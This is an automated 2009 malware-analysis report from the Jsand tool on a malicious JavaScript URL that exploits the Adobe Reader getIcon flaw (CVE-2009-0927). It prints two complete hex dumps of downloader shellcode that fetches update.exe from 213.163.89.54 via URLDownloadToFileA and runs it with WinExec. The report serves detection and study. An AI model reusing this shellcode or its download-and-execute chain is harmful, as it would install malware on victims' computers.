Analysis report for http://yahoo-analytics.net/laso/s.php

Sample Overview

URLhttp://yahoo-analytics.net/laso/s.php
MD5f69151533f36f14c4a058bf3aa6441a9
Analysis Started2009-09-29 00:28:31
Report Generated2009-09-29 00:28:37
Jsand version1.03.02

See the report for domain yahoo-analytics.net.

Detection results

DetectorResult
Jsand 1.03.02malicious

Exploits

NameDescriptionReference
Adobe getIconStack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab objectCVE-2009-0927

Deobfuscation results

Evals

Writes

No writes.

Network Activity

Requests

URLStatusContent Type
http://yahoo-analytics.net/laso/s.php404text/javascript
about:blank200text/html
http://213.163.89.54/lib/index.php200text/html
http://213.163.89.54/lib/searchYouFor.pdf200application/pdf
http://213.163.89.54/lib/yearsBeliefBelow.swf200application/x-shockwave-flash

Redirects

No redirects.

ActiveX controls

Shellcode and Malware

HexadecimalASCII
50 53 51 52 56 57 55 9c  e8 00 00 00 00 5d 83 ed 
0d 31 c0 64 03 40 30 78  0c 8b 40 0c 8b 70 1c ad 
8b 40 08 eb 09 8b 40 34  8d 40 7c 8b 40 3c 56 57 
be 5e 01 00 00 01 ee bf  4e 01 00 00 01 ef e8 d6 
01 00 00 5f 5e 89 ea 81  c2 5e 01 00 00 52 68 80 
00 00 00 ff 95 4e 01 00  00 89 ea 81 c2 5e 01 00 
00 31 f6 01 c2 8a 9c 35  63 02 00 00 80 fb 00 74 
06 88 1c 32 46 eb ee c6  04 32 00 89 ea 81 c2 45 
02 00 00 52 ff 95 52 01  00 00 89 ea 81 c2 50 02 
00 00 52 50 ff 95 56 01  00 00 6a 00 6a 00 89 ea 
81 c2 5e 01 00 00 52 89  ea 81 c2 78 02 00 00 52 
6a 00 ff d0 6a 05 89 ea  81 c2 5e 01 00 00 52 ff 
95 5a 01 00 00 89 ea 81  c2 5e 01 00 00 52 68 80 
00 00 00 ff 95 4e 01 00  00 89 ea 81 c2 5e 01 00 
00 31 f6 01 c2 8a 9c 35  6e 02 00 00 80 fb 00 74 
06 88 1c 32 46 eb ee c6  04 32 00 89 ea 81 c2 45 
02 00 00 52 ff 95 52 01  00 00 89 ea 81 c2 50 02 
00 00 52 50 ff 95 56 01  00 00 6a 00 6a 00 89 ea 
81 c2 5e 01 00 00 52 89  ea 81 c2 a6 02 00 00 52 
6a 00 ff d0 6a 05 89 ea  81 c2 5e 01 00 00 52 ff 
95 5a 01 00 00 9d 5d 5f  5e 5a 59 5b 58 c3 00 00 
00 00 00 00 00 00 00 00  00 00 00 00 00 00 47 65 
74 54 65 6d 70 50 61 74  68 41 00 4c 6f 61 64 4c 
69 62 72 61 72 79 41 00  47 65 74 50 72 6f 63 41 
64 64 72 65 73 73 00 57  69 6e 45 78 65 63 00 bb 
89 f2 89 f7 30 c0 ae 75  fd 29 f7 89 f9 31 c0 be 
3c 00 00 00 03 b5 1b 02  00 00 66 ad 03 85 1b 02 
00 00 8b 70 78 83 c6 1c  03 b5 1b 02 00 00 8d bd 
1f 02 00 00 ad 03 85 1b  02 00 00 ab ad 03 85 1b 
02 00 00 50 ab ad 03 85  1b 02 00 00 ab 5e 31 db 
ad 56 03 85 1b 02 00 00  89 c6 89 d7 51 fc f3 a6 
59 74 04 5e 43 eb e9 5e  93 d1 e0 03 85 27 02 00 
00 31 f6 96 66 ad c1 e0  02 03 85 1f 02 00 00 89 
c6 ad 03 85 1b 02 00 00  c3 eb 10 00 00 00 00 00 
00 00 00 00 00 00 00 00  00 00 00 89 85 1b 02 00 
00 56 57 e8 58 ff ff ff  5f 5e ab 01 ce 80 3e bb 
74 02 eb ed c3 55 52 4c  4d 4f 4e 2e 44 4c 4c 00 
55 52 4c 44 6f 77 6e 6c  6f 61 64 54 6f 46 69 6c 
65 41 00 75 70 64 61 74  65 2e 65 78 65 00 63 72 
61 73 68 2e 70 68 70 00  68 74 74 70 3a 2f 2f 32 
31 33 2e 31 36 33 2e 38  39 2e 35 34 2f 6c 69 62 
2f 75 70 64 61 74 65 2e  70 68 70 3f 69 64 3d 36 
00 90 
PSQRVWU......]..
.1.d.@0x..@..p..
.@....@4.@|.@<VW
.^......N.......
..._^....^...Rh.
.....N.......^..
.1.....5c......t
...2F....2.....E
...R..R.......P.
..RP..V...j.j...
..^...R....x...R
j...j.....^...R.
.Z.......^...Rh.
.....N.......^..
.1.....5n......t
...2F....2.....E
...R..R.......P.
..RP..V...j.j...
..^...R........R
j...j.....^...R.
.Z....]_^ZY[X...
..............Ge
tTempPathA.LoadL
ibraryA.GetProcA
ddress.WinExec..
....0..u.)...1..
<.........f.....
...px...........
................
...P.........^1.
.V..........Q...
Yt.^C..^.....'..
.1..f...........
................
................
.VW.X..._^....>.
t....URLMON.DLL.
URLDownloadToFil
eA.update.exe.cr
ash.php.http://2
13.163.89.54/lib
/update.php?id=6
..
50 53 51 52 56 57 55 9c  e8 00 00 00 00 5d 83 ed 
0d 31 c0 64 03 40 30 78  0c 8b 40 0c 8b 70 1c ad 
8b 40 08 eb 09 8b 40 34  8d 40 7c 8b 40 3c 56 57 
be 5e 01 00 00 01 ee bf  4e 01 00 00 01 ef e8 d6 
01 00 00 5f 5e 89 ea 81  c2 5e 01 00 00 52 68 80 
00 00 00 ff 95 4e 01 00  00 89 ea 81 c2 5e 01 00 
00 31 f6 01 c2 8a 9c 35  63 02 00 00 80 fb 00 74 
06 88 1c 32 46 eb ee c6  04 32 00 89 ea 81 c2 45 
02 00 00 52 ff 95 52 01  00 00 89 ea 81 c2 50 02 
00 00 52 50 ff 95 56 01  00 00 6a 00 6a 00 89 ea 
81 c2 5e 01 00 00 52 89  ea 81 c2 78 02 00 00 52 
6a 00 ff d0 6a 05 89 ea  81 c2 5e 01 00 00 52 ff 
95 5a 01 00 00 89 ea 81  c2 5e 01 00 00 52 68 80 
00 00 00 ff 95 4e 01 00  00 89 ea 81 c2 5e 01 00 
00 31 f6 01 c2 8a 9c 35  6e 02 00 00 80 fb 00 74 
06 88 1c 32 46 eb ee c6  04 32 00 89 ea 81 c2 45 
02 00 00 52 ff 95 52 01  00 00 89 ea 81 c2 50 02 
00 00 52 50 ff 95 56 01  00 00 6a 00 6a 00 89 ea 
81 c2 5e 01 00 00 52 89  ea 81 c2 a6 02 00 00 52 
6a 00 ff d0 6a 05 89 ea  81 c2 5e 01 00 00 52 ff 
95 5a 01 00 00 9d 5d 5f  5e 5a 59 5b 58 c3 00 00 
00 00 00 00 00 00 00 00  00 00 00 00 00 00 47 65 
74 54 65 6d 70 50 61 74  68 41 00 4c 6f 61 64 4c 
69 62 72 61 72 79 41 00  47 65 74 50 72 6f 63 41 
64 64 72 65 73 73 00 57  69 6e 45 78 65 63 00 bb 
89 f2 89 f7 30 c0 ae 75  fd 29 f7 89 f9 31 c0 be 
3c 00 00 00 03 b5 1b 02  00 00 66 ad 03 85 1b 02 
00 00 8b 70 78 83 c6 1c  03 b5 1b 02 00 00 8d bd 
1f 02 00 00 ad 03 85 1b  02 00 00 ab ad 03 85 1b 
02 00 00 50 ab ad 03 85  1b 02 00 00 ab 5e 31 db 
ad 56 03 85 1b 02 00 00  89 c6 89 d7 51 fc f3 a6 
59 74 04 5e 43 eb e9 5e  93 d1 e0 03 85 27 02 00 
00 31 f6 96 66 ad c1 e0  02 03 85 1f 02 00 00 89 
c6 ad 03 85 1b 02 00 00  c3 eb 10 00 00 00 00 00 
00 00 00 00 00 00 00 00  00 00 00 89 85 1b 02 00 
00 56 57 e8 58 ff ff ff  5f 5e ab 01 ce 80 3e bb 
74 02 eb ed c3 55 52 4c  4d 4f 4e 2e 44 4c 4c 00 
55 52 4c 44 6f 77 6e 6c  6f 61 64 54 6f 46 69 6c 
65 41 00 75 70 64 61 74  65 2e 65 78 65 00 63 72 
61 73 68 2e 70 68 70 00  68 74 74 70 3a 2f 2f 32 
31 33 2e 31 36 33 2e 38  39 2e 35 34 2f 6c 69 62 
2f 75 70 64 61 74 65 2e  70 68 70 3f 69 64 3d 35 
00 90 
PSQRVWU......]..
.1.d.@0x..@..p..
.@....@4.@|.@<VW
.^......N.......
..._^....^...Rh.
.....N.......^..
.1.....5c......t
...2F....2.....E
...R..R.......P.
..RP..V...j.j...
..^...R....x...R
j...j.....^...R.
.Z.......^...Rh.
.....N.......^..
.1.....5n......t
...2F....2.....E
...R..R.......P.
..RP..V...j.j...
..^...R........R
j...j.....^...R.
.Z....]_^ZY[X...
..............Ge
tTempPathA.LoadL
ibraryA.GetProcA
ddress.WinExec..
....0..u.)...1..
<.........f.....
...px...........
................
...P.........^1.
.V..........Q...
Yt.^C..^.....'..
.1..f...........
................
................
.VW.X..._^....>.
t....URLMON.DLL.
URLDownloadToFil
eA.update.exe.cr
ash.php.http://2
13.163.89.54/lib
/update.php?id=5
..

Additional (potential) malware:

URLTypeHashAnalysis
http://213.163.89.54/lib/update.php?id=5 MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit dd75f500820b98d2b7acbe182c03dc86
http://213.163.89.54/lib/update.php?id=6 MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit dd75f500820b98d2b7acbe182c03dc86